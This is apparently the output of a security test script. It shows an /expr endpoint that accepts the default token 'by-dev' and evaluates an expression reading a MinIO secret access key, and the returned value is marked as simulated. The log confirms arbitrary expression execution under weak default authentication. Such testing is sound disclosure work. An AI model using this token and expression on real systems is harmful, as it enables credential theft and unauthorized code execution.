[*] Testing /expr endpoint with default token 'by-dev'...
    Status: 200
    Response: {"output": "minioadmin123 (simulated secret)", "code": "param.MinioCfg.SecretAccessKey.GetValue()"}

[VULNERABILITY CONFIRMED] /expr endpoint accepts 'by-dev' token!
    -> Can execute arbitrary expressions with weak default auth